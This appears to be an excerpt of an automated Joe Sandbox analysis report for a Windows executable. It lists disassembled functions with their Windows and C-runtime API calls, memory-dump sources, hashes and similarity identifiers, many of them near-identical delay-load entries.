                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0047ACDB,0045D710,00000000,00000000,00000000,?,0047AED8,00000006,FlsSetValue,00487970,FlsSetValue,00000000), ref: 0047AD80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3177248105-0
                                                                  • Opcode ID: 6dd777ae693644caf568fe33de626372b877efff5c65a7c95da754faba23aa44
                                                                  • Instruction ID: 7b167608c21183f6abdba1a7a2328e7240c1559f9c1ca6ae4bc4cd45a743427c
                                                                  • Opcode Fuzzy Hash: 6dd777ae693644caf568fe33de626372b877efff5c65a7c95da754faba23aa44
                                                                  • Instruction Fuzzy Hash: EB01D836201222ABC7318F68DC449DF7B99EF85BA37214A35F90AD3650D724DC1187EA
                                                                  APIs
                                                                    • Part of subcall function 004797E5: GetLastError.KERNEL32(?,00491030,00474674,00491030,?,?,00473F73,00000050,?,00491030,00000200), ref: 004797E9
                                                                    • Part of subcall function 004797E5: _free.LIBCMT ref: 0047981C
                                                                    • Part of subcall function 004797E5: SetLastError.KERNEL32(00000000,?,00491030,00000200), ref: 0047985D
                                                                    • Part of subcall function 004797E5: _abort.LIBCMT ref: 00479863
                                                                    • Part of subcall function 0047BB4E: _abort.LIBCMT ref: 0047BB80
                                                                    • Part of subcall function 0047BB4E: _free.LIBCMT ref: 0047BBB4
                                                                    • Part of subcall function 0047B7BB: GetOEMCP.KERNEL32(00000000,?,?,0047BA44,?), ref: 0047B7E6
                                                                  • _free.LIBCMT ref: 0047BA9F
                                                                  • _free.LIBCMT ref: 0047BAD5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorLast_abort
                                                                  • String ID: pH
                                                                  • API String ID: 2991157371-1451419334
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: (F$PDGu<F
                                                                  • API String ID: 1269201914-873579442
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: 2F$PDGu<F
                                                                  • API String ID: 1269201914-394011115
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0045D343,00000001,?,?,?,00000000,0046551D,?,?,?), ref: 00459F9E
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0046551D,?,?,?,?,?,00464FC7,?), ref: 00459FE5
                                                                  • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0045D343,00000001,?,?), ref: 0045A011
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$Handle
                                                                  • String ID:
                                                                  • API String ID: 4209713984-0
                                                                  APIs
                                                                    • Part of subcall function 0045C27E: _wcslen.LIBCMT ref: 0045C284
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A2D9
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A30C
                                                                  • GetLastError.KERNEL32(?,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A329
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2260680371-0
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0047B8B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID:
                                                                  • API String ID: 1807457897-3916222277
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0047AFDD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: String
                                                                  • String ID: LCMapStringEx
                                                                  • API String ID: 2568140703-3893581201
                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0047A56F), ref: 0047AF55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                  • String ID: InitializeCriticalSectionEx
                                                                  • API String ID: 2593887523-3084827643
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Alloc
                                                                  • String ID: FlsAlloc
                                                                  • API String ID: 2773662609-671089009
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: cd0f58969a9a19c6a3400c0bd7def36f5c66dec0353758bef4ea553b6d4d624b
                                                                  • Instruction ID: b9a9c9d919a3e13a89f33d98a20591aea50e53d8ef725fe4943fa74e0ea49746
                                                                  • Opcode Fuzzy Hash: cd0f58969a9a19c6a3400c0bd7def36f5c66dec0353758bef4ea553b6d4d624b
                                                                  • Instruction Fuzzy Hash: 6AB09299258100AC3144614B1842D7B018CC081B11330842FB805C2080A868AC011A3B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 50b79a7f7a01da1b865ddac4ffcd77bee0d0abfe32c78ff431969dbff97f8c54
                                                                  • Instruction ID: 8ca87eb71ba8e1e19512a560ab760d319c4ca6dfba137448195494d6c3153dd6
                                                                  • Opcode Fuzzy Hash: 50b79a7f7a01da1b865ddac4ffcd77bee0d0abfe32c78ff431969dbff97f8c54
                                                                  • Instruction Fuzzy Hash: E1B09299258000AC2144660B1802D7A018CC082B11330C42FF805C2180A858AC051A3B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 7c725ec1cf0c21abeb28885f09ebbd20d7492539b1dec27408cb8ccfa99385df
                                                                  • Instruction ID: 6e9dc114a90e430701bff8640290992e7aa133e5bb08f61ed8266bf69ccb8f17
                                                                  • Opcode Fuzzy Hash: 7c725ec1cf0c21abeb28885f09ebbd20d7492539b1dec27408cb8ccfa99385df
                                                                  • Instruction Fuzzy Hash: 97B09299259040BC2244610B1802D7A018DC082B11330842FF805C2080A858AC01193B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 709c7d9ea29f3a8e8c45188cc7e8446913007ee8e4b2518db38597daf14c2e0b
                                                                  • Instruction ID: db1bcac7011941bef9d4b0826b9a86d1e7e209f38f661fd2c3aac7bca2e2a453
                                                                  • Opcode Fuzzy Hash: 709c7d9ea29f3a8e8c45188cc7e8446913007ee8e4b2518db38597daf14c2e0b
                                                                  • Instruction Fuzzy Hash: 73B012E9259140FC3284720B1C02D7B018DC0C1B11330853FF805C2080F85CBC45193F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 47ff4c860defbedcefed66d5555084220b86cd887f0f8421e9a4f14bdcf36a8e
                                                                  • Instruction ID: 4901e0e03a4881fdee7680dde6c3e42d96d822127910b0f58cce8b110bc80be0
                                                                  • Opcode Fuzzy Hash: 47ff4c860defbedcefed66d5555084220b86cd887f0f8421e9a4f14bdcf36a8e
                                                                  • Instruction Fuzzy Hash: F3B012D9269040FC3244710B1C02D7B11CDC4C1B11330843FF806C2080F86CAC01193F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: deb3644f67adf01b7d5ed0fbe18101613ffd55623030b2053f0363de41204a4f
                                                                  • Instruction ID: c4b818b5f990db8fd284ff6e9542c66c12103c6b88d660503306aceaf9b76e6d
                                                                  • Opcode Fuzzy Hash: deb3644f67adf01b7d5ed0fbe18101613ffd55623030b2053f0363de41204a4f
                                                                  • Instruction Fuzzy Hash: DFB09299258000AC2544A11B1C02D7A018CC082B11330842FF805C2080A958AC01193B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 43e776b4d3e982a6d65f3f105cab93bc97ce6ee7ea0ce935e3296203f9d10d88
                                                                  • Instruction ID: dff7a43ea038e03146b984a7b81f7d3c1b45ca359dd9b8379f148be816fb0ab7
                                                                  • Opcode Fuzzy Hash: 43e776b4d3e982a6d65f3f105cab93bc97ce6ee7ea0ce935e3296203f9d10d88
                                                                  • Instruction Fuzzy Hash: DDB09299258140BC2184620B1802D7A018CC081B11330852FB805C2180A858AC45193B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 357913b0a1af0d8a80eb81d0253576d7811af238630688548f6927e4a6827f18
                                                                  • Instruction ID: eb2fc2727b3dad70e3707f0d93b9c9627db74860422716ab4658a5bd867529dd
                                                                  • Opcode Fuzzy Hash: 357913b0a1af0d8a80eb81d0253576d7811af238630688548f6927e4a6827f18
                                                                  • Instruction Fuzzy Hash: AFB09299298000AC2144620B1902D7A018CC081B11330842FB805C2180A868AD0A193B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 3aba68a9146115427d0f037f099707082f88be1796e7deacf19ab7386780a433
                                                                  • Instruction ID: 2247bc459b67c20bf8ef1f69a2e096a26e94c71d3578c55129b0a715cd5432ee
                                                                  • Opcode Fuzzy Hash: 3aba68a9146115427d0f037f099707082f88be1796e7deacf19ab7386780a433
                                                                  • Instruction Fuzzy Hash: 41B092A9258000BC2144650B1802D7A018CC482B11330842FF805C2080A858AD01193B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 461477285ff8755a739bf2689368dab1147b3db788c9929a25969f3bb3b73b07
                                                                  • Instruction ID: 633101b38d129adb13cc16f043f9ae65cb4410a6d677d28e5b13a3bb85329755
                                                                  • Opcode Fuzzy Hash: 461477285ff8755a739bf2689368dab1147b3db788c9929a25969f3bb3b73b07
                                                                  • Instruction Fuzzy Hash: DAB092A9258100BC2184650B1802D7A018CC081B11330852FB805C2080A858AD41193B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: f52aea37c8f9541718f30676c8c66b09d38738336d1ffaa62dfd1edeadcaad63
                                                                  • Instruction ID: fe4cc8db85fa2bcc290ea176713f1a3b83c4df1c16c2b79b3eac1f6d417c4897
                                                                  • Opcode Fuzzy Hash: f52aea37c8f9541718f30676c8c66b09d38738336d1ffaa62dfd1edeadcaad63
                                                                  • Instruction Fuzzy Hash: 74B092A9298000AC2144650B1912D7A018CC081B11330842FB805C2080E858AE02193B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
